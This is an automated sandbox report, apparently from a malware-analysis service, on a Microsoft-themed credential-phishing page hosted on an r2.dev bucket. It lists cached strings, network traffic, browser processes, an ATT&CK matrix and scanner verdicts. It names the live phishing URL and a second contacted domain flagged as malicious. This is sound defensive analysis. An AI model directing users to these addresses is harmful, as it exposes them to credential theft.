Source: sets.json.0.dr	String found in binary or memory: https://cachematrix.com
Source: sets.json.0.dr	String found in binary or memory: https://cafemedia.com
Source: sets.json.0.dr	String found in binary or memory: https://caracoltv.com
Source: sets.json.0.dr	String found in binary or memory: https://carcostadvisor.be
Source: sets.json.0.dr	String found in binary or memory: https://carcostadvisor.com
Source: sets.json.0.dr	String found in binary or memory: https://carcostadvisor.fr
Source: sets.json.0.dr	String found in binary or memory: https://cardsayings.net
Source: sets.json.0.dr	String found in binary or memory: https://chennien.com
Source: sets.json.0.dr	String found in binary or memory: https://clarosports.com
Source: sets.json.0.dr	String found in binary or memory: https://clmbtech.com
Source: sets.json.0.dr	String found in binary or memory: https://clubelpais.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://cmxd.com.mx
Source: chromecache_167.2.dr	String found in binary or memory: https://code.jquery.com/jquery-3.1.1.min.js
Source: sets.json.0.dr	String found in binary or memory: https://commentcamarche.com
Source: sets.json.0.dr	String found in binary or memory: https://commentcamarche.net
Source: sets.json.0.dr	String found in binary or memory: https://computerbild.de
Source: sets.json.0.dr	String found in binary or memory: https://cookreactor.com
Source: sets.json.0.dr	String found in binary or memory: https://cricbuzz.com
Source: sets.json.0.dr	String found in binary or memory: https://desimartini.com
Source: chromecache_139.2.dr	String found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
Source: sets.json.0.dr	String found in binary or memory: https://dewarmsteweek.be
Source: sets.json.0.dr	String found in binary or memory: https://economictimes.com
Source: sets.json.0.dr	String found in binary or memory: https://een.be
Source: sets.json.0.dr	String found in binary or memory: https://efront.com
Source: sets.json.0.dr	String found in binary or memory: https://eleconomista.net
Source: sets.json.0.dr	String found in binary or memory: https://elfinancierocr.com
Source: sets.json.0.dr	String found in binary or memory: https://elgrafico.com
Source: sets.json.0.dr	String found in binary or memory: https://ella.sv
Source: sets.json.0.dr	String found in binary or memory: https://elpais.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://elpais.uy
Source: sets.json.0.dr	String found in binary or memory: https://etfacademy.it
Source: sets.json.0.dr	String found in binary or memory: https://eworkbookcloud.com
Source: sets.json.0.dr	String found in binary or memory: https://eworkbookrequest.com
Source: sets.json.0.dr	String found in binary or memory: https://fakt.pl
Source: sets.json.0.dr	String found in binary or memory: https://finn.no
Source: sets.json.0.dr	String found in binary or memory: https://firstlook.biz
Source: sets.json.0.dr	String found in binary or memory: https://gallito.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://gettalkdesk.com
Source: sets.json.0.dr	String found in binary or memory: https://gliadomain.com
Source: sets.json.0.dr	String found in binary or memory: https://grid.id
Source: sets.json.0.dr	String found in binary or memory: https://gridgames.app
Source: sets.json.0.dr	String found in binary or memory: https://growthrx.in
Source: sets.json.0.dr	String found in binary or memory: https://grupolpg.sv
Source: sets.json.0.dr	String found in binary or memory: https://gujaratijagran.com
Source: sets.json.0.dr	String found in binary or memory: https://hapara.com
Source: sets.json.0.dr	String found in binary or memory: https://hc1.com
Source: sets.json.0.dr	String found in binary or memory: https://hc1.global
Source: sets.json.0.dr	String found in binary or memory: https://hc1cas.com
Source: sets.json.0.dr	String found in binary or memory: https://hc1cas.global
Source: sets.json.0.dr	String found in binary or memory: https://healthshots.com
Source: sets.json.0.dr	String found in binary or memory: https://hearty.app
Source: sets.json.0.dr	String found in binary or memory: https://hearty.gift
Source: sets.json.0.dr	String found in binary or memory: https://hearty.me
Source: sets.json.0.dr	String found in binary or memory: https://heartymail.com
Source: sets.json.0.dr	String found in binary or memory: https://hindustantimes.com
Source: sets.json.0.dr	String found in binary or memory: https://hj.rs
Source: sets.json.0.dr	String found in binary or memory: https://hjck.com
Source: sets.json.0.dr	String found in binary or memory: https://human-talk.org
Source: sets.json.0.dr	String found in binary or memory: https://idbs-cloud.com
Source: sets.json.0.dr	String found in binary or memory: https://idbs-dev.com
Source: sets.json.0.dr	String found in binary or memory: https://idbs-eworkbook.com
Source: sets.json.0.dr	String found in binary or memory: https://idbs-staging.com
Source: sets.json.0.dr	String found in binary or memory: https://indiatimes.com
Source: sets.json.0.dr	String found in binary or memory: https://iolam.it
Source: sets.json.0.dr	String found in binary or memory: https://ishares.com
Source: sets.json.0.dr	String found in binary or memory: https://jagran.com
Source: sets.json.0.dr	String found in binary or memory: https://journaldesfemmes.com
Source: sets.json.0.dr	String found in binary or memory: https://journaldesfemmes.fr
Source: sets.json.0.dr	String found in binary or memory: https://journaldunet.com
Source: sets.json.0.dr	String found in binary or memory: https://journaldunet.fr
Source: sets.json.0.dr	String found in binary or memory: https://joyreactor.cc
Source: sets.json.0.dr	String found in binary or memory: https://joyreactor.com
Source: sets.json.0.dr	String found in binary or memory: https://kaksya.in
Source: sets.json.0.dr	String found in binary or memory: https://kompas.com
Source: sets.json.0.dr	String found in binary or memory: https://kompas.tv
Source: sets.json.0.dr	String found in binary or memory: https://kompasiana.com
Source: sets.json.0.dr	String found in binary or memory: https://lanacion.com.ar
Source: sets.json.0.dr	String found in binary or memory: https://landyrev.com
Source: sets.json.0.dr	String found in binary or memory: https://landyrev.ru
Source: sets.json.0.dr	String found in binary or memory: https://laprensagrafica.com
Source: sets.json.0.dr	String found in binary or memory: https://lateja.cr
Source: sets.json.0.dr	String found in binary or memory: https://libero.it
Source: sets.json.0.dr	String found in binary or memory: https://linternaute.com
Source: sets.json.0.dr	String found in binary or memory: https://linternaute.fr
Source: sets.json.0.dr	String found in binary or memory: https://livehindustan.com
Source: sets.json.0.dr	String found in binary or memory: https://livemint.com
Source: sets.json.0.dr	String found in binary or memory: https://max.auto
Source: sets.json.0.dr	String found in binary or memory: https://medonet.pl
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.cl
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.co.cr
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.ar
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.bo
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.co
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.do
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.ec
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.gt
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.hn
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.mx
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.ni
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.pa
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.pe
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.py
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.sv
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.ve
Source: sets.json.0.dr	String found in binary or memory: https://mercadolivre.com
Source: sets.json.0.dr	String found in binary or memory: https://mercadolivre.com.br
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.cl
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.ar
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.br
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.co
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.ec
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.mx
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.pe
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.ve
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.cl
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com.ar
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com.br
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com.co
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com.mx
Source: sets.json.0.dr	String found in binary or memory: https://mighty-app.appspot.com
Source: sets.json.0.dr	String found in binary or memory: https://mightytext.net
Source: sets.json.0.dr	String found in binary or memory: https://mittanbud.no
Source: sets.json.0.dr	String found in binary or memory: https://money.pl
Source: sets.json.0.dr	String found in binary or memory: https://mystudentdashboard.com
Source: sets.json.0.dr	String found in binary or memory: https://nacion.com
Source: sets.json.0.dr	String found in binary or memory: https://nidhiacademyonline.com
Source: sets.json.0.dr	String found in binary or memory: https://nien.co
Source: sets.json.0.dr	String found in binary or memory: https://nien.com
Source: sets.json.0.dr	String found in binary or memory: https://nien.org
Source: sets.json.0.dr	String found in binary or memory: https://noticiascaracol.com
Source: sets.json.0.dr	String found in binary or memory: https://nourishingpursuits.com
Source: sets.json.0.dr	String found in binary or memory: https://o2.pl
Source: sets.json.0.dr	String found in binary or memory: https://ocdn.eu
Source: sets.json.0.dr	String found in binary or memory: https://onet.pl
Source: sets.json.0.dr	String found in binary or memory: https://ottplay.com
Source: chromecache_167.2.dr	String found in binary or memory: https://outlook.office.com/mail/
Source: chromecache_167.2.dr	String found in binary or memory: https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2frep
Source: sets.json.0.dr	String found in binary or memory: https://paula.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://pdmp-apis.no
Source: sets.json.0.dr	String found in binary or memory: https://phonandroid.com
Source: sets.json.0.dr	String found in binary or memory: https://player.pl
Source: sets.json.0.dr	String found in binary or memory: https://plejada.pl
Source: sets.json.0.dr	String found in binary or memory: https://poalim.site
Source: sets.json.0.dr	String found in binary or memory: https://poalim.xyz
Source: sets.json.0.dr	String found in binary or memory: https://portalinmobiliario.com
Source: sets.json.0.dr	String found in binary or memory: https://prisjakt.no
Source: sets.json.0.dr	String found in binary or memory: https://pudelek.pl
Source: sets.json.0.dr	String found in binary or memory: https://punjabijagran.com
Source: sets.json.0.dr	String found in binary or memory: https://radio1.be
Source: sets.json.0.dr	String found in binary or memory: https://radio2.be
Source: sets.json.0.dr	String found in binary or memory: https://reactor.cc
Source: sets.json.0.dr	String found in binary or memory: https://repid.org
Source: sets.json.0.dr	String found in binary or memory: https://reshim.org
Source: sets.json.0.dr	String found in binary or memory: https://rws1nvtvt.com
Source: sets.json.0.dr	String found in binary or memory: https://rws2nvtvt.com
Source: sets.json.0.dr	String found in binary or memory: https://rws3nvtvt.com
Source: sets.json.0.dr	String found in binary or memory: https://salemoveadvisor.com
Source: sets.json.0.dr	String found in binary or memory: https://salemovefinancial.com
Source: sets.json.0.dr	String found in binary or memory: https://salemovetravel.com
Source: sets.json.0.dr	String found in binary or memory: https://samayam.com
Source: sets.json.0.dr	String found in binary or memory: https://shock.co
Source: sets.json.0.dr	String found in binary or memory: https://smoney.vn
Source: sets.json.0.dr	String found in binary or memory: https://songshare.com
Source: sets.json.0.dr	String found in binary or memory: https://songstats.com
Source: sets.json.0.dr	String found in binary or memory: https://sporza.be
Source: sets.json.0.dr	String found in binary or memory: https://standardsandpraiserepurpose.com
Source: sets.json.0.dr	String found in binary or memory: https://startupislandtaiwan.com
Source: sets.json.0.dr	String found in binary or memory: https://startupislandtaiwan.net
Source: sets.json.0.dr	String found in binary or memory: https://startupislandtaiwan.org
Source: sets.json.0.dr	String found in binary or memory: https://stripe.com
Source: sets.json.0.dr	String found in binary or memory: https://stripe.network
Source: sets.json.0.dr	String found in binary or memory: https://stripecdn.com
Source: sets.json.0.dr	String found in binary or memory: https://supereva.it
Source: sets.json.0.dr	String found in binary or memory: https://talkdeskqaid.com
Source: sets.json.0.dr	String found in binary or memory: https://talkdeskstgid.com
Source: sets.json.0.dr	String found in binary or memory: https://teacherdashboard.com
Source: sets.json.0.dr	String found in binary or memory: https://technology-revealed.com
Source: sets.json.0.dr	String found in binary or memory: https://textyserver.appspot.com
Source: sets.json.0.dr	String found in binary or memory: https://timesinternet.in
Source: sets.json.0.dr	String found in binary or memory: https://timesofindia.com
Source: sets.json.0.dr	String found in binary or memory: https://tribunnews.com
Source: sets.json.0.dr	String found in binary or memory: https://trytalkdesk.com
Source: sets.json.0.dr	String found in binary or memory: https://tucarro.com
Source: sets.json.0.dr	String found in binary or memory: https://tucarro.com.co
Source: sets.json.0.dr	String found in binary or memory: https://tucarro.com.ve
Source: sets.json.0.dr	String found in binary or memory: https://tvid.in
Source: sets.json.0.dr	String found in binary or memory: https://tvn.pl
Source: sets.json.0.dr	String found in binary or memory: https://tvn24.pl
Source: sets.json.0.dr	String found in binary or memory: https://unotv.com
Source: sets.json.0.dr	String found in binary or memory: https://victorymedium.com
Source: sets.json.0.dr	String found in binary or memory: https://vrt.be
Source: sets.json.0.dr	String found in binary or memory: https://vwo.com
Source: sets.json.0.dr	String found in binary or memory: https://welt.de
Source: sets.json.0.dr	String found in binary or memory: https://wieistmeineip.de
Source: sets.json.0.dr	String found in binary or memory: https://wildix.com
Source: sets.json.0.dr	String found in binary or memory: https://wildixin.com
Source: sets.json.0.dr	String found in binary or memory: https://wingify.com
Source: sets.json.0.dr	String found in binary or memory: https://wordle.at
Source: sets.json.0.dr	String found in binary or memory: https://wp.pl
Source: sets.json.0.dr	String found in binary or memory: https://wpext.pl
Source: sets.json.0.dr	String found in binary or memory: https://www.asadcdn.com
Source: chromecache_139.2.dr	String found in binary or memory: https://www.cloudflare.com/favicon.ico
Source: sets.json.0.dr	String found in binary or memory: https://ya.ru
Source: sets.json.0.dr	String found in binary or memory: https://zalo.me
Source: sets.json.0.dr	String found in binary or memory: https://zdrowietvn.pl
Source: sets.json.0.dr	String found in binary or memory: https://zingmp3.vn

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60902
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.4:49752 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5356_1067268235			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5356_1067268235\sets.json			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5356_1067268235\manifest.json			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5356_1067268235\LICENSE			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5356_1067268235\_metadata\			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5356_1067268235\_metadata\verified_contents.json			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5356_1067268235\manifest.fingerprint			Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\chrome_BITS_5356_401827792

Jump to behavior

Source: classification engine

Classification label: mal76.phis.win@24/79@22/11

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2212,i,1600881696001814177,16701260416799824026,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2212,i,1600881696001814177,16701260416799824026,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
http://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html	100%	Avira URL Cloud	phishing
http://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://account.live.com/resetpassword.aspx	0%	URL Reputation	safe
https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90b	0%	URL Reputation	safe
https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg	0%	URL Reputation	safe
https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg	0%	URL Reputation	safe
https://code.jquery.com/jquery-3.1.1.min.js	0%	URL Reputation	safe
https://mercadoshops.com.br	0%	Avira URL Cloud	safe
https://nourishingpursuits.com	0%	Avira URL Cloud	safe
https://reshim.org	0%	Avira URL Cloud	safe
https://mercadoshops.com.co	0%	Avira URL Cloud	safe
https://mercadolivre.com	0%	Avira URL Cloud	safe
https://poalim.xyz	0%	Avira URL Cloud	safe
https://wieistmeineip.de	0%	Avira URL Cloud	safe
https://gliadomain.com	0%	Avira URL Cloud	safe
https://medonet.pl	0%	Avira URL Cloud	safe
https://unotv.com	0%	Avira URL Cloud	safe
https://joyreactor.cc	0%	Avira URL Cloud	safe
https://zdrowietvn.pl	0%	Avira URL Cloud	safe
https://baomoi.com	0%	Avira URL Cloud	safe
https://songstats.com	0%	Avira URL Cloud	safe
https://supereva.it	0%	Avira URL Cloud	safe
https://bolasport.com	0%	Avira URL Cloud	safe
https://elfinancierocr.com	0%	Avira URL Cloud	safe
https://rws1nvtvt.com	0%	Avira URL Cloud	safe
https://hearty.app	0%	Avira URL Cloud	safe
https://desimartini.com	0%	Avira URL Cloud	safe
https://finn.no	0%	Avira URL Cloud	safe
https://heartymail.com	0%	Avira URL Cloud	safe
https://mercadoshops.com	0%	Avira URL Cloud	safe
https://radio2.be	0%	Avira URL Cloud	safe
https://hearty.gift	0%	Avira URL Cloud	safe
https://songshare.com	0%	Avira URL Cloud	safe
https://kompas.tv	0%	Avira URL Cloud	safe
https://mystudentdashboard.com	0%	Avira URL Cloud	safe
https://hc1.com	0%	Avira URL Cloud	safe
https://mercadopago.com.mx	0%	Avira URL Cloud	safe
https://mercadopago.com.pe	0%	Avira URL Cloud	safe
https://talkdeskqaid.com	0%	Avira URL Cloud	safe
https://cardsayings.net	0%	Avira URL Cloud	safe
https://eworkbookcloud.com	0%	Avira URL Cloud	safe
https://wildixin.com	0%	Avira URL Cloud	safe
https://mightytext.net	0%	Avira URL Cloud	safe
https://pudelek.pl	0%	Avira URL Cloud	safe
https://nacion.com	0%	Avira URL Cloud	safe
https://joyreactor.com	0%	Avira URL Cloud	safe
https://cookreactor.com	0%	Avira URL Cloud	safe
https://mercadopago.cl	0%	Avira URL Cloud	safe
https://chennien.com	0%	Avira URL Cloud	safe
https://bonvivir.com	0%	Avira URL Cloud	safe
https://talkdeskstgid.com	0%	Avira URL Cloud	safe
https://poalim.site	0%	Avira URL Cloud	safe
https://blackrockadvisorelite.it	0%	Avira URL Cloud	safe
https://welt.de	0%	Avira URL Cloud	safe
https://salemovetravel.com	0%	Avira URL Cloud	safe
https://wpext.pl	0%	Avira URL Cloud	safe
https://carcostadvisor.be	0%	Avira URL Cloud	safe
https://mercadoshops.com.ar	0%	Avira URL Cloud	safe
https://elpais.uy	0%	Avira URL Cloud	safe
https://cafemedia.com	0%	Avira URL Cloud	safe
https://landyrev.com	0%	Avira URL Cloud	safe
https://commentcamarche.com	0%	Avira URL Cloud	safe
https://tucarro.com.ve	0%	Avira URL Cloud	safe
https://mercadolivre.com.br	0%	Avira URL Cloud	safe
https://rws3nvtvt.com	0%	Avira URL Cloud	safe
https://eleconomista.net	0%	Avira URL Cloud	safe
https://clmbtech.com	0%	Avira URL Cloud	safe
https://mercadopago.com.br	0%	Avira URL Cloud	safe
https://salemovefinancial.com	0%	Avira URL Cloud	safe
https://standardsandpraiserepurpose.com	0%	Avira URL Cloud	safe
https://commentcamarche.net	0%	Avira URL Cloud	safe
https://etfacademy.it	0%	Avira URL Cloud	safe
https://hj.rs	0%	Avira URL Cloud	safe
https://mercadolibre.com.gt	0%	Avira URL Cloud	safe
https://hearty.me	0%	Avira URL Cloud	safe
https://mighty-app.appspot.com	0%	Avira URL Cloud	safe
https://timesinternet.in	0%	Avira URL Cloud	safe
https://idbs-staging.com	0%	Avira URL Cloud	safe
https://blackrock.com	0%	Avira URL Cloud	safe
https://idbs-eworkbook.com	0%	Avira URL Cloud	safe
https://hjck.com	0%	Avira URL Cloud	safe
https://mercadolibre.co.cr	0%	Avira URL Cloud	safe
https://vrt.be	0%	Avira URL Cloud	safe
https://prisjakt.no	0%	Avira URL Cloud	safe
https://kompas.com	0%	Avira URL Cloud	safe
https://idbs-dev.com	0%	Avira URL Cloud	safe
https://wingify.com	0%	Avira URL Cloud	safe
https://player.pl	0%	Avira URL Cloud	safe
https://mercadolibre.cl	0%	Avira URL Cloud	safe
https://mercadolibre.com.hn	0%	Avira URL Cloud	safe
https://mercadopago.com.ar	0%	Avira URL Cloud	safe
https://linternaute.com	0%	Avira URL Cloud	safe
https://tucarro.com.co	0%	Avira URL Cloud	safe
https://clarosports.com	0%	Avira URL Cloud	safe
https://een.be	0%	Avira URL Cloud	safe
https://landyrev.ru	0%	Avira URL Cloud	safe
https://rws2nvtvt.com	0%	Avira URL Cloud	safe
https://punjabijagran.com	0%	Avira URL Cloud	safe
https://grupolpg.sv	0%	Avira URL Cloud	safe
https://abczdrowie.pl	0%	Avira URL Cloud	safe
https://cmxd.com.mx	0%	Avira URL Cloud	safe
https://nien.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
part-0039.t-0009.t-msedge.net	13.107.213.67	true	false		unknown
bg.microsoft.map.fastly.net	199.232.214.172	true	false		unknown
part-0017.t-0009.t-msedge.net	13.107.213.45	true	false		unknown
cs1100.wpc.omegacdn.net	152.199.23.37	true	false		unknown
code.jquery.com	151.101.194.137	true	false		unknown
pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev	104.18.2.35	true	true		unknown
www.google.com	142.250.184.228	true	false		unknown
c2millwrightmachineshop.ca	148.72.158.229	true	true		unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false		unknown
passwordreset.microsoftonline.com	unknown	unknown	false		unknown
aadcdn.msftauth.net	unknown	unknown	false		unknown
ajax.aspnetcdn.com	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
